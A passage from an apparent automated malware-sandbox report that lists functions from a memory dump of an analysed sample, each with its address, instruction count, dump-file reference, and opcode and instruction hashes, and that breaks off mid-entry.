                                          Download Yara Rule

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: d243f24f64664c25d58ad58e2de85992793d92bd9d5ebdd82c241ced69e07211
                                          • Instruction ID: b0b47daab611869bb46ec7c62c43cb4149e888c8d33b1934e1888325e1b230e4
                                          • Opcode Fuzzy Hash: d243f24f64664c25d58ad58e2de85992793d92bd9d5ebdd82c241ced69e07211
                                          • Instruction Fuzzy Hash: DD517071E1A64EAFDB59DB98C4605FDB7B1FF44300F5541BEC01AEB2A6CA396A01CB10
                                          Function 00007FFD9B9E6AE1 Relevance: .4, Instructions: 406COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6a8657875f8f35aa5f4b5c692e4d9227976dcea73d57762f89c925400c184e87
                                          • Instruction ID: 55e1f7913a5b637720de8a75f17b7feb44d242db17cb1be165731d746af2e039
                                          • Opcode Fuzzy Hash: 6a8657875f8f35aa5f4b5c692e4d9227976dcea73d57762f89c925400c184e87
                                          • Instruction Fuzzy Hash: E6D13430A2EB4A9FE378CBA8D4A45757BE1FF44304B51457DC08EC76E2DE29BA428741
                                          Function 00007FFD9B9EAC2F Relevance: .4, Instructions: 389COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 41d81fc9013d731678c4fc3143388f5c198f087a22dd8d362631c24b4e65fcf5
                                          • Instruction ID: e74807beaa7bc9692bf98ecb39bfba3c41b8e482f9b23850048b8b6c641b3593
                                          • Opcode Fuzzy Hash: 41d81fc9013d731678c4fc3143388f5c198f087a22dd8d362631c24b4e65fcf5
                                          • Instruction Fuzzy Hash: 6FC17B21A2EA8E5FE3399B6858645B57BD0EF52310B1605BED08FC71F3DE187B028351
                                          Function 00007FFD9B9E2D4F Relevance: .4, Instructions: 350COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a2a4240ece248f98007b34ebcd5783bd8a7253aeea540be70b0a39b02f760216
                                          • Instruction ID: 38b8bbb9cefe629b043084b43af3132a0ceab2ca12ec123ab74595808f6a77bb
                                          • Opcode Fuzzy Hash: a2a4240ece248f98007b34ebcd5783bd8a7253aeea540be70b0a39b02f760216
                                          • Instruction Fuzzy Hash: 8A21D496F2F19FA6F63962E924354FC7B405F84321F3A49BBD45D890E2DC0C2B8513A2
                                          Function 00007FFD9BA01DFE Relevance: .3, Instructions: 329COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6b8b19b3f89c2638594fdd7fb5456975283bf6963392b204e8e544ddde0a2777
                                          • Instruction ID: 689c6f4c72e28fb679f284def61d9d3f5c8cd584c75cb67c4d5db006d0d0f234
                                          • Opcode Fuzzy Hash: 6b8b19b3f89c2638594fdd7fb5456975283bf6963392b204e8e544ddde0a2777
                                          • Instruction Fuzzy Hash: B2C1F630A196598FEB58CF58C4E06F437A1FF56310F5141BDD88ECB29ADB78A981CB80
                                          Function 00007FFD9B9EC058 Relevance: .3, Instructions: 288COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 403fb3a19eeac5b377a8ca0d5b85ad29b3115ba4522c0beec5461524bf525859
                                          • Instruction ID: 959607c726f0c15a87dd880a4df68d57c5deea479c5d32234c2e16691e139c22
                                          • Opcode Fuzzy Hash: 403fb3a19eeac5b377a8ca0d5b85ad29b3115ba4522c0beec5461524bf525859
                                          • Instruction Fuzzy Hash: ABB1C23062955A9FEB58CF58C0E05B437B1FF45310B6552BDC89ACB69BC638FA81CB80
                                          Function 00007FFD9B9E2328 Relevance: .3, Instructions: 273COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f0cc2bad34129ee8d47498046c02ba90946b1a5896a0593ac251e51bcd2d442
                                          • Instruction ID: b79e873e5b83c97255503df1c028d2efa9c5ab86c4db21a0e5e52ac3c90e560f
                                          • Opcode Fuzzy Hash: 0f0cc2bad34129ee8d47498046c02ba90946b1a5896a0593ac251e51bcd2d442
                                          • Instruction Fuzzy Hash: 5791D870A0991D8FDFA4EF98C495AEDBBF1FF58301F51016AD00DE72A1DA34AA85CB40
                                          Function 00007FFD9B9E4896 Relevance: .3, Instructions: 255COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c73205d8e6fa069ca60c60e8be5f2afe112fa797352b0ffedbd2c9ac88aafe62
                                          • Instruction ID: 68099d03f225f52bbb49524df4c025ceaf863b744e892fd83ab9242b2d248d66
                                          • Opcode Fuzzy Hash: c73205d8e6fa069ca60c60e8be5f2afe112fa797352b0ffedbd2c9ac88aafe62
                                          • Instruction Fuzzy Hash: 2C713B31B2E64A5BE7789A9894A56BD77D0FF45310B17017ED08FC3293DE197B028741
                                          Function 00007FFD9B9E29F1 Relevance: .3, Instructions: 252COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2a6841d8a242ec346988b3c5efbc768e17f580b76591b100aaf6c4b1c33a2a53
                                          • Instruction ID: 08209a179b33352a709d3521c66b65d8c87ad61da52df833f76fc0e343410efc
                                          • Opcode Fuzzy Hash: 2a6841d8a242ec346988b3c5efbc768e17f580b76591b100aaf6c4b1c33a2a53
                                          • Instruction Fuzzy Hash: F8712530B1D54E9FE7B8DED8C8656B437D1FF49311B1A02B9D44EC75B2DA28AB068780
                                          Function 00007FFD9B9E9169 Relevance: .3, Instructions: 251COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4c1f69d18b6781561a12cf32d10cd8dbc788dc492cde534de422354c9db1bee7
                                          • Instruction ID: ef228d017226c91df9ae3f9a398da156d33fca512a1bc325e171badc5f2c79fc
                                          • Opcode Fuzzy Hash: 4c1f69d18b6781561a12cf32d10cd8dbc788dc492cde534de422354c9db1bee7
                                          • Instruction Fuzzy Hash: AA710931B2D44D5FEB78DA5C886D5BC37C0FF48310B1502B9E45EC76B2D929AB168781
                                          Function 00007FFD9B9E9A3B Relevance: .2, Instructions: 230COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c9a24b517853c13c9264c2d619afa7183d4134b6023dd62559479551307f96c
                                          • Instruction ID: 3eada90da7dfe5c8853041ba5ecf0fc36a962cb5ccace5c6dd2f1a519befa56a
                                          • Opcode Fuzzy Hash: 3c9a24b517853c13c9264c2d619afa7183d4134b6023dd62559479551307f96c
                                          • Instruction Fuzzy Hash: 0471C430A2D54EAEEB75DBA888686BC7BE1EF55300F5501BAD00EC71E2DE386A41C741
                                          Function 00007FFD9B9E7779 Relevance: .2, Instructions: 222COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b294a4a43ddd955d693ceb535732e721cd9faf0662e9439c242b89a86b180928
                                          • Instruction ID: 1e60ebd39b7add0aa22ffffb211e64f7692ec88ba1b2779af6ecd1236b9adef0
                                          • Opcode Fuzzy Hash: b294a4a43ddd955d693ceb535732e721cd9faf0662e9439c242b89a86b180928
                                          • Instruction Fuzzy Hash: B151463161EB494FD76A8B5898995307BE0EF6632071902BEC08EC71B3D929BD43C742
                                          Function 00007FFD9B9ECF81 Relevance: .2, Instructions: 218COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 58f5738a417853ea31c9a1080322601e17bc77d832e910252aafc2136b66598f
                                          • Instruction ID: 7169bb6651b4dd1e80d63b3d91b16f0ed26a405cf02011e7ae3a7f5f19f4fe64
                                          • Opcode Fuzzy Hash: 58f5738a417853ea31c9a1080322601e17bc77d832e910252aafc2136b66598f
                                          • Instruction Fuzzy Hash: 8181F330A2EB4A9FE378DB64D1A057177E1FF05304B15497DD48F87AA2CB29BA42CB40
                                          Function 00007FFD9B9E54AE Relevance: .2, Instructions: 209COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 92479ffb858ac8029932095c536109b904ae17ab6d053e3f54201f4a7f1b4db5
                                          • Instruction ID: 59fbde50f4a1e07b01ebc30bf2b36ebd0683b8df32e8ed7c23cd9426193fa0b4
                                          • Opcode Fuzzy Hash: 92479ffb858ac8029932095c536109b904ae17ab6d053e3f54201f4a7f1b4db5
                                          • Instruction Fuzzy Hash: 1971297062EA8A9FD759DB68D0B05A4BBA0FF15300F5541B9C04ECB6D7CB28BA51C790
                                          Function 00007FFD9B9EB947 Relevance: .2, Instructions: 208COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3a75a413cb6d0d9daf7eae454cbd3a83ff1c3d818a143be7b747ed24cc0255f
                                          • Instruction ID: 9af8c54faebddea5d20bf2cd4020c259faaba1e69e00873e4bf5e7e9295475af
                                          • Opcode Fuzzy Hash: a3a75a413cb6d0d9daf7eae454cbd3a83ff1c3d818a143be7b747ed24cc0255f
                                          • Instruction Fuzzy Hash: A671153061EA8A9FD759DB68D1F05A4BBE0FF05300F4641B9C04EC7697DB28BA51C791
                                          Function 00007FFD9B9E7541 Relevance: .2, Instructions: 191COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9dcc69e0d4ac23ce29b3726e491e03b50bc9a9dab158ccbf75fce185503b5aca
                                          • Instruction ID: 93f4fad81e6936683d6ef1a7ad1d84b8bc64e3c3d22396d8e4360974754e8d22
                                          • Opcode Fuzzy Hash: 9dcc69e0d4ac23ce29b3726e491e03b50bc9a9dab158ccbf75fce185503b5aca
                                          • Instruction Fuzzy Hash: 3C513D30E1955D9FDB94EFA8D865AEDBBB1FF54300F14016AD00DE7296CB38A981CB41
                                          Function 00007FFD9B9EBF5A Relevance: .2, Instructions: 181COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5e86c57639673d84e7f78a8bc2af9f0c102ac441b8081febf2a430e24032c262
                                          • Instruction ID: 9aa5722f3538d4637cc3cbb4d86a20c50763187b9f5d4c265739419c63f85c38
                                          • Opcode Fuzzy Hash: 5e86c57639673d84e7f78a8bc2af9f0c102ac441b8081febf2a430e24032c262
                                          • Instruction Fuzzy Hash: 7A61D03062E54A9BEB2DCF98D4B05757BB1FF4130171545BDC48B8B69BCA28FA41CB41
                                          Function 00007FFD9B9E80C8 Relevance: .2, Instructions: 170COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 39e740add64811068258a430f8475df78bed5ad79ef6e1290715009643a17131
                                          • Instruction ID: 8e8c48d406a4fe593f1578604746fc4b595c48fa6abec785fe9983759af4c59b
                                          • Opcode Fuzzy Hash: 39e740add64811068258a430f8475df78bed5ad79ef6e1290715009643a17131
                                          • Instruction Fuzzy Hash: E6516B21F3E55B6BE738A6E864704BC77A0EF80315B26527AD09F865D7CC2CB7814681
                                          Function 00007FFD9B9E35BB Relevance: .2, Instructions: 157COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 141aa6a81ebc80ce0365e40e6afd369485a870f08ee5a73ae305569a426985f2
                                          • Instruction ID: 32334b51a86ae5a2a9a201be6c515678f58330c9360f11534bf3711eed84f160
                                          • Opcode Fuzzy Hash: 141aa6a81ebc80ce0365e40e6afd369485a870f08ee5a73ae305569a426985f2
                                          • Instruction Fuzzy Hash: F951B031E2D54EAEEB66DBB4C4655FC7BB0FF55704F5504BAD00ED62A2DE286A01C700
                                          Function 00007FFD9B9E5CAF Relevance: .2, Instructions: 152COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bc6c0cbc2b16a318ea49f300bb56c7a9247368520e074086bbe96117fc60b2c
                                          • Instruction ID: d7476bd2bbf4f286ed9b86793bbe68b30ca950aa52275463a67d274bb9c431f0
                                          • Opcode Fuzzy Hash: 6bc6c0cbc2b16a318ea49f300bb56c7a9247368520e074086bbe96117fc60b2c
                                          • Instruction Fuzzy Hash: DB51913052A6459FEB89CF18C0E46B03BA5FF45310B9451ADC84BCF69BD769E5C2CB40
                                          Function 00007FFD9B9E2FD5 Relevance: .1, Instructions: 147COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 40bdd31d110208aed6eb24a9bf727a53f3b00541c62f8f78feb71a56a987d707
                                          • Instruction ID: 5f2ea77bb52d4845706366de452d47ab58ff8e5cd80e08cb49dccebc2c230e64
                                          • Opcode Fuzzy Hash: 40bdd31d110208aed6eb24a9bf727a53f3b00541c62f8f78feb71a56a987d707
                                          • Instruction Fuzzy Hash: 08515E70A1D65E9FDBA9DB68C8A4BB977B1FB54300F1101BED00DD72A1DE346A84CB40
                                          Function 00007FFD9B9EC2D0 Relevance: .1, Instructions: 128COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f7528103e5a30587f35399266c592f7b03e277d57d9449a773ecc0a93e50bb9c
                                          • Instruction ID: dcf6f41e16731a4bb08d4cfb0793787b841fc5c2aa773636d899a31d6c265478
                                          • Opcode Fuzzy Hash: f7528103e5a30587f35399266c592f7b03e277d57d9449a773ecc0a93e50bb9c
                                          • Instruction Fuzzy Hash: 70410320A2D45E5BEB78D76884706B8B7B1FF54300F1141BAC09ED71E6DD386B818B81
                                          Function 00007FFD9B9E5E30 Relevance: .1, Instructions: 128COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c823dee85805eb50bfa5fd447068871b31655460e0cc55d734ec23f335c10fd8
                                          • Instruction ID: 56789ce841c92e92fdc8750fcd9c96dc75370568aaf1f75d43231b5b49efa4f1
                                          • Opcode Fuzzy Hash: c823dee85805eb50bfa5fd447068871b31655460e0cc55d734ec23f335c10fd8
                                          • Instruction Fuzzy Hash: 6641F730A2D55EAEEB78D75484756B8BBA1FF54300F1581BDC05ECB196DD387B808741
                                          Function 00007FFD9B9E7107 Relevance: .1, Instructions: 127COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 865d12206f7bfcca492d7a8df9d77aa81125c5389640a818e4ce79f38a1d56eb
                                          • Instruction ID: 5a76a6717de159a950198d7fc9bbc543d370536ffc43537afa500ebeae525284
                                          • Opcode Fuzzy Hash: 865d12206f7bfcca492d7a8df9d77aa81125c5389640a818e4ce79f38a1d56eb
                                          • Instruction Fuzzy Hash: 1841947260C9488FDF98EF28C4A5DA5B3E1FFA8310B0501AAD05EC7292DE35F945CB81
                                          Function 00007FFD9B9ED5A7 Relevance: .1, Instructions: 126COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 95ca1b2b76f396794183ce3f1bfa0c44f9f56e2aa11f9b1f7efc467500b61757
                                          • Instruction ID: 609e4b611654646d51d554d5f5db508f7b00b1e8dbc1a61e8b7b63b5f8abd864
                                          • Opcode Fuzzy Hash: 95ca1b2b76f396794183ce3f1bfa0c44f9f56e2aa11f9b1f7efc467500b61757
                                          • Instruction Fuzzy Hash: 0A41713270C9488FDF98FB68C4A5DA9B3E1FF68714B05016AD04EC72A2DE25F945CB81
                                          Function 00007FFD9B9E263D Relevance: .1, Instructions: 120COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6ee779e8ada23d9c0b52f45bd060acab36bdc5146a415feabdbed8c0cbb8afb6
                                          • Instruction ID: 2c6c41c5f43482d6c313276b3df10bc30eb4e5cbe26eafbb73e67e9407181923
                                          • Opcode Fuzzy Hash: 6ee779e8ada23d9c0b52f45bd060acab36bdc5146a415feabdbed8c0cbb8afb6
                                          • Instruction Fuzzy Hash: 9441A431D1DA8D9FDB54DF98C8645ED7BB0FF58300F4501AAD009D71A2DB38AA55CB41
                                          Function 00007FFD9B9ED651 Relevance: .1, Instructions: 120COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bd26a1494006a8e8a65791439fcd370956c051ef80cafdaadaa28b2ec2aef0f8
                                          • Instruction ID: a7346a8e6a0f95b46c0d93d15a40404886573044337aeb053bf8955c6acbbab5
                                          • Opcode Fuzzy Hash: bd26a1494006a8e8a65791439fcd370956c051ef80cafdaadaa28b2ec2aef0f8
                                          • Instruction Fuzzy Hash: B3318F3160CD488FDF98EB68C4A5EA473E1FFA971470501AAD45EC72A2DE24F940CB81
                                          Function 00007FFD9B9E71B1 Relevance: .1, Instructions: 120COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7863a146d3bda7383ecbeaa8a656e6a8314275b7fa142421cbd147d2ab8e3afe
                                          • Instruction ID: 11ac42444ad998ce7d108824424dee1d20113cc6be8bf92ce62f81653b495562
                                          • Opcode Fuzzy Hash: 7863a146d3bda7383ecbeaa8a656e6a8314275b7fa142421cbd147d2ab8e3afe
                                          • Instruction Fuzzy Hash: 3D31717260C9488FDF58EF28C4A5E64B3E1FFA8314B0501AED05AC72A2DE25E940CB81
                                          Function 00007FFD9B9E8FA9 Relevance: .1, Instructions: 115COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8ebc2c3ff74718ce4bfcd4d6cbde0b023348ef79660c53860b9aa09a462855a1
                                          • Instruction ID: d61941ae0b5c05be80c4f1c96e5339dbfa6b5c455b5f60a0fc061d18cc0604ac
                                          • Opcode Fuzzy Hash: 8ebc2c3ff74718ce4bfcd4d6cbde0b023348ef79660c53860b9aa09a462855a1
                                          • Instruction Fuzzy Hash: B6312821A2F29E6BF73597A858395BC3B50EF41310F1611BAD45E860E3ED283B015262
                                          Function 00007FFD9B9ED5EB Relevance: .1, Instructions: 115COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 407dc46ed8d337ac4ef23eb0662290d207d7dea4f1a0565754427f16392b508b
                                          • Instruction ID: fdf0728a389b05576fbe528d21b6a7631a4efe632c0f6b8913e35d31d71d2da8
                                          • Opcode Fuzzy Hash: 407dc46ed8d337ac4ef23eb0662290d207d7dea4f1a0565754427f16392b508b
                                          • Instruction Fuzzy Hash: 07316D3170C9498FDF98EB68C0A5EA8B3E1FF6871470501AAD05EC72A2DE24F941CB81
                                          Function 00007FFD9B9E714B Relevance: .1, Instructions: 115COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8358f6ceae74e1411ae6757f08c46ab732e76e672f6e62b2526e389797394206
                                          • Instruction ID: 5cf3a67258340fb3d66727315535f4a91c82f28f4dabc3f08e854787a416eadf
                                          • Opcode Fuzzy Hash: 8358f6ceae74e1411ae6757f08c46ab732e76e672f6e62b2526e389797394206
                                          • Instruction Fuzzy Hash: D531627160C9498FDF58EF28C4A5EA5B3E1FFA8310B0501AED05AC7692DE39E941CB81
                                          Function 00007FFD9B9E8E0D Relevance: .1, Instructions: 107COMMON
                                          Download Yara Rule
                                          Memory Dump Source
